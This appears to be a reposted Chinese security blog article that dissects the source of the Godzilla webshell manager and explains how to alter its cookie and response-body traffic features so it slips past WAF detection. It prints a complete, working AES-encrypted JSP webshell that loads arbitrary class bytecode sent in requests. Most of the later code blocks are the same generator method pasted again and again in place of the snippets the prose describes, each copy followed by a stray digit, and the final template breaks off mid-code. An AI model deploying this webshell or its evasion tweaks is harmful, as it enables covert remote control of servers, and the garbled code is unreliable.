正文

干货 | 哥斯拉源码解读+如何绕过waf检测

admin
admin V管理员 /0 评论 /39 阅读
1220
此篇文章发布距今已超过22天,您需要注意文章的内容或图片是否可用!

点击上方蓝字关注我们

现在只对常读和星标的公众号才展示大图推送,建议大家能把星落安全团队设为星标”,否则可能就看不到了啦

文章前言

来源:先知社区,作者:ooyywwll

原文:https://xz.aliyun.com/t/16515
一个 webshell 工具核心无疑就是三点,webshell 生成,webshell 连接,webshell 利用,那为什么哥斯拉能够在 hw 期间沸沸扬扬,这里我们拆开他的源码来简单分析

环境搭建

直接下载别人已经反编译好的源码就可以了
https://github.com/safe6Sec/ShellManageTool
然后把 resource 设置为资源目录

webshell 生成

可以看到哥斯拉有如下的选项
密码和 key 自定义,有效载荷就是什么类型的 webshell,然后和加密器
对应到代码部分,这里以 java 为例子了
shells/cryptions/JavaAes/Generate.java
开始调试分析,首当其冲的是 GenerateShellLoder 方法
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
首先获取薄板,是根据我们的加密器来决定的,这里选的 base64
内容如下
try {
    // 解码传入的 base64 字符串
    byte[] data = base64Decode(request.getParameter(pass));

    data = x(data, false);

    // 如果 session 中没有 "payload" 属性,则初始化它
    if (session.getAttribute("payload") == null) {
        session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));
    } else {
        // 如果 "payload" 已存在,则将数据存入请求参数
        request.setAttribute("parameters", data);

        // 创建一个 ByteArrayOutputStream 对象
        java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();

        // 创建一个新的 "payload" 类实例并执行一些操作
        Object f = ((Class) session.getAttribute("payload")).newInstance();

        // 这两行代码的作用可能是执行某些方法(实际上似乎在执行一些无效的操作)
        f.equals(arrOut);  // 这里可能有逻辑错误,equals 方法不应该在这里使用
        f.equals(pageContext);  // 这里也类似,pageContext 似乎并不相关

        // 使用 md5 对数据进行处理,并分段输出
        response.getWriter().write(md5.substring(0, 16));

        // 将 ByteArrayOutputStream 的内容进行 Base64 编码后写入响应
        response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));

        // 输出 md5 后半部分
        response.getWriter().write(md5.substring(16));
    }
} catch (Exception e) {
    // 处理异常
    e.printStackTrace();  // 输出异常的堆栈信息
}
这也是我们生成文件的模板
主要是在设置响应的内容,然后我们直接看到最后生成的 webshell 吧,因为中间就是对输入的值的一些替换
<%!
    // 定义常量和变量
    String xc = "3c6e0b8a9c15224a";
    String pass = "passasd";
    String md5 = md5(pass + xc);

    // 自定义类加载器,继承 ClassLoader
    class X extends ClassLoader {
        public X(ClassLoader z) {
            super(z); // 使用指定的父加载器
        }

        // 自定义方法:从字节数组加载类
        public Class Q(byte[] cb) {
            return super.defineClass(cb, 0, cb.length); // 定义并返回类
        }
    }

    // AES 加解密方法
    public byte[] x(byte[] s, boolean m) {
        try {
            javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
            c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));
            return c.doFinal(s); // 执行加解密
        } catch (Exception e) {
            return null; // 处理异常,返回 null
        }
    }

    // MD5 加密方法
    public static String md5(String s) {
        String ret = null;
        try {
            java.security.MessageDigest m = java.security.MessageDigest.getInstance("MD5");
            m.update(s.getBytes(), 0, s.length());
            ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); // 转换为十六进制并返回
        } catch (Exception e) {}
        return ret;
    }

    // Base64 编码方法
    public static String base64Encode(byte[] bs) throws Exception {
        Class base64;
        String value = null;
        try {
            // 使用 Java 8+ 的 Base64 编码
            base64 = Class.forName("java.util.Base64");
            Object encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
            value = (String) encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(encoder, new Object[]{bs});
        } catch (Exception e) {
            try {
                // 使用旧版本的 Base64 编码
                base64 = Class.forName("sun.misc.BASE64Encoder");
                Object encoder = base64.newInstance();
                value = (String) encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(encoder, new Object[]{bs});
            } catch (Exception e2) {}
        }
        return value; // 返回编码后的字符串
    }

    // Base64 解码方法
    public static byte[] base64Decode(String bs) throws Exception {
        Class base64;
        byte[] value = null;
        try {
            // 使用 Java 8+ 的 Base64 解码
            base64 = Class.forName("java.util.Base64");
            Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
            value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
        } catch (Exception e) {
            try {
                // 使用旧版本的 Base64 解码
                base64 = Class.forName("sun.misc.BASE64Decoder");
                Object decoder = base64.newInstance();
                value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
            } catch (Exception e2) {}
        }
        return value; // 返回解码后的字节数组
    }
%>

<%
    try {
        // 从请求中获取传入的 base64 参数并进行解码
        byte[] data = base64Decode(request.getParameter(pass));
        data = x(data, false); // 使用 AES 解密

        // 如果 session 中没有 payload,则加载字节码
        if (session.getAttribute("payload") == null) {
            session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));
        } else {
            // 如果 payload 存在,则继续处理
            request.setAttribute("parameters", data);

            // 创建 ByteArrayOutputStream 用于存储数据
            java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();

            // 通过反射实例化 payload
            Object f = ((Class) session.getAttribute("payload")).newInstance();

            // 执行一些不必要的操作(这里只是防止错误的代码)
            f.equals(arrOut);
            f.equals(pageContext);

            // 向响应中写入 MD5 字符串的前 16 个字符
            response.getWriter().write(md5.substring(0, 16));

            // 将处理后的数据进行 Base64 编码并写入响应
            response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));

            // 写入 MD5 字符串的后 16 个字符
            response.getWriter().write(md5.substring(16));
        }
    } catch (Exception e) {
        // 捕获异常并忽略
    }
%>

连接 webshell

首先连接你生成的 webshell,对应的 ui 是在 testButtonClick 方法
private void testButtonClick(ActionEvent actionEvent) {
    if (!updateTempShellEntity()) {
        JOptionPane.showMessageDialog(this, this.error, "提示", 2);
        this.error = null;
    } else if (!this.shellContext.initShellOpertion()) {
        JOptionPane.showMessageDialog(this, "initShellOpertion Fail", "提示", 2);
    } else if (this.shellContext.getPayloadModel().test()) {
        JOptionPane.showMessageDialog(this, "Success!", "提示", 1);
    } else {
        JOptionPane.showMessageDialog(this, "Payload Test Fail", "提示", 2);
    }
}
然后看到 updateTempShellEntity 方法,就是更新一些初始化的值
代码中也能看出来他的作用,回到方法往下看initShellOpertion
public boolean initShellOpertion() {
    boolean state = false;
    try {
        this.http = ApplicationContext.getHttp(this);
        this.payloadModel = ApplicationContext.getPayload(this.payload);
        this.cryptionModel = ApplicationContext.getCryption(this.payload, this.cryption);
        //初始化,会发送初始化payload
        this.cryptionModel.init(this);
        if (this.cryptionModel.check()) {
            this.payloadModel.init(this);
            //发送测试包
            if (this.payloadModel.test()) {
                state = true;
            } else {
                Log.error("payload Initialize Fail !");
            }
        } else {
            Log.error("cryption Initialize Fail !");
        }
        return state;
    } catch (Exception e) {
        Log.error(e);
        return false;
    }
}
初始化 payloadModel 和 cryptionModel 对象。这两个名字就能看出他们的作用,payloadModel
可以看到它实现的接口,都是用于文件操作和命令执行的。而 getCryption 就是加解密的
然后就是相应的init 方法
public void init(ShellEntity context) {
    this.shell = context;
    this.http = this.shell.getHttp();
    this.key = this.shell.getSecretKeyX();
    this.pass = this.shell.getPassword();
    String findStrMd5 = functions.md5(this.pass + new String(this.key));
    //初始化md5标识
    this.findStrLeft = findStrMd5.substring(0, 16).toUpperCase();
    this.findStrRight = findStrMd5.substring(16).toUpperCase();
    try {
        this.encodeCipher = Cipher.getInstance("AES");
        this.decodeCipher = Cipher.getInstance("AES");
        this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"));
        this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"));
        this.payload = this.shell.getPayloadModel().getPayload();
        if (this.payload != null) {
            this.http.sendHttpResponse(this.payload);
            this.state = true;
            return;
        }
        Log.error("payload Is Null");
    } catch (Exception e) {
        Log.error(e);
    }
}
可以看到初始化了我们传入的必要参数,然后对我们的后续加解密做一个处理,这里分析 paylaod。而这个 paylaod 其实就是 shells/java/assets/payload.class 类文件的字节码。然后通过 sendHttpResponse 发送给我们的服务端,对应的加密逻辑其实也是在 sendHttpResponse 方法。最终重载的方法是在
public HttpResponse sendHttpResponse(Map<String, String> header, byte[] requestData, int connTimeOut, int readTimeOut) {
    int i;
    int i2 = 1;
    //对发送数据进行加密
    byte[] requestData2 = this.shellContext.getCryptionModel().encode(requestData);
    if (this.shellContext.isSendLRReqData()) {
        byte[] leftData = this.shellContext.getReqLeft().getBytes();
        byte[] rightData = this.shellContext.getReqRight().getBytes();
        if (leftData.length > 0) {
            i = leftData.length;
        } else {
            i = 1;
        }
        Object concatArrays = functions.concatArrays(leftData, 0, i - 1, requestData2, 0, requestData2.length - 1);
        int length = (leftData.length + requestData2.length) - 1;
        if (rightData.length > 0) {
            i2 = rightData.length;
        }
        requestData2 = (byte[]) functions.concatArrays(concatArrays, 0, length, rightData, 0, i2 - 1);
    }
    return SendHttpConn(this.shellContext.getUrl(), "POST", header, requestData2, connTimeOut, readTimeOut, this.proxy);
}
先是 getCryptionModel 获取我们已经初始化好的对象,然后调用它的 encode 方法去加密。加密逻辑如下
public byte[] encode(byte[] data) {
    try {
        return (this.pass + "=" + URLEncoder.encode(functions.base64Encode(this.encodeCipher.doFinal(data)))).getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
可以通过 bp 抓
然后我们关注它的 check 方法,这个决定了我们是否进行下一步
public boolean check() {
    return this.state;
}
关键因素就是 state 的值。赋值还是在我们的 init 方法
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
0
通过请求是否发送成功来判断的。然后开始 payloadModel 的 init 方法了,其实就是获取一些基础的东西
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
1
然后来到 test 方法,简单说了,这里主要和强特征有关系,就是执行 test 后会发送一个请求,表示 ok
按照
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
2
就是 ok,但是发现一个连接成功的请求会发送两次一样的流量。因为在 testButtonClick 方法还会执行 this.shellContext.getPayloadModel().test()
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
3

流量特征

cookie 的;号

观察我们的 bp 的包
可以发现 cookie 后面是有一个;号的。按照道理来说,最后一个 cookie 值是不应该有;号的,随便找一个包,也可以证实
我们寻找对应的代码逻辑,也就是 setcookie 的值。对应的代码如下
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
4
可以看到形式为%s=%s;后面加了分号,我们直接删掉

响应体特征

我们随便找一个响应的包
发现很想 base64,但是前后面又加了一些奇怪的东西。md5 前十六位+base64+md5 后十六位。代码对应的逻辑是在我们的模板文件
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
5
可以看到响应就是这样写的。我们可以直接修改模板文件,毕竟 jsp 中是可以插入 html 代码的。但是只修改模板文件是不行的,你毕竟还有前端和后端我们看看后端是如何处理这个内容的。我们看看对响应的逻辑处理
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
6
把响应传入了 ReadAllData 方法
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
7
跟进 decode 方法
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
8
这里开始解码了,关键是 findStr 对我们的数据进行了处理
public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) {
    String template;
    try {

        InputStream inputStream = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "GlobalCode.bin");
        String globalCode = new String(functions.readInputStream(inputStream));
        inputStream.close();
        String globalCode2 = globalCode.replace("{pass}", pass).replace("{secretKey}", secretKey);
        InputStream inputStream2 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/" + (isBin ? "raw" : "base64") + "Code.bin");
        String code = new String(functions.readInputStream(inputStream2));
        inputStream2.close();
        Object selectedValue = JOptionPane.showInputDialog((Component) null, "suffix", "selected suffix", 1, (Icon) null, SUFFIX, (Object) null);
        if (selectedValue == null) {
            return null;
        }
        String suffix = (String) selectedValue;
        InputStream inputStream3 = Generate.class.getClassLoader().getResourceAsStream("shell/java/template/shell." + suffix);
        String template2 = new String(functions.readInputStream(inputStream3));
        inputStream3.close();
        //jspx 需要处理
        if (suffix.equals(SUFFIX[1])) {
            globalCode2 = globalCode2.replace("<", "&lt;").replace(">", "&gt;");
            code = code.replace("<", "&lt;").replace(">", "&gt;");
        }
        //判断是不是上帝模式,如果是会进行unicode编码
        if (ApplicationContext.isGodMode()) {
            template = template2.replace("{globalCode}", functions.stringToUnicode(globalCode2)).replace("{code}", functions.stringToUnicode(code));
        } else {
            template = template2.replace("{globalCode}", globalCode2).replace("{code}", code);
        }
        return template.replace("n", "").replace("r", "").getBytes();
    } catch (Exception e) {
        Log.error(e);
        return null;
    }
}
9
就是只截取中间的字符串,也就是 base64 编码的部分
所以我们需要修改的话还需要修改后端的逻辑
这里各位师傅都各显神通了,伪造了 waf 页面是一个不错的选择
这里可以参考开源工具
https://github.com/kong030813/Z-Godzilla_ekp
try {
    // 解码传入的 base64 字符串
    byte[] data = base64Decode(request.getParameter(pass));

    data = x(data, false);

    // 如果 session 中没有 "payload" 属性,则初始化它
    if (session.getAttribute("payload") == null) {
        session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));
    } else {
        // 如果 "payload" 已存在,则将数据存入请求参数
        request.setAttribute("parameters", data);

        // 创建一个 ByteArrayOutputStream 对象
        java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();

        // 创建一个新的 "payload" 类实例并执行一些操作
        Object f = ((Class) session.getAttribute("payload")).newInstance();

        // 这两行代码的作用可能是执行某些方法(实际上似乎在执行一些无效的操作)
        f.equals(arrOut);  // 这里可能有逻辑错误,equals 方法不应该在这里使用
        f.equals(pageContext);  // 这里也类似,pageContext 似乎并不相关

        // 使用 md5 对数据进行处理,并分段输出
        response.getWriter().write(md5.substring(0, 16));

        // 将 ByteArrayOutputStream 的内容进行 Base64 编码后写入响应
        response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));

        // 输出 md5 后半部分
        response.getWriter().write(md5.substring(16));
    }
} catch (Exception e) {
    // 处理异常
    e.printStackTrace();  // 输出异常的堆栈信息
}
0
可以看到把原来的修改为了固定头加替换,半固定吧
然后我们看效果
可以看到原作回显已经变了
当然模板也需要修改了
我们看看二开的模板
try {
    // 解码传入的 base64 字符串
    byte[] data = base64Decode(request.getParameter(pass));

    data = x(data, false);

    // 如果 session 中没有 "payload" 属性,则初始化它
    if (session.getAttribute("payload") == null) {
        session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));
    } else {
        // 如果 "payload" 已存在,则将数据存入请求参数
        request.setAttribute("parameters", data);

        // 创建一个 ByteArrayOutputStream 对象
        java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();

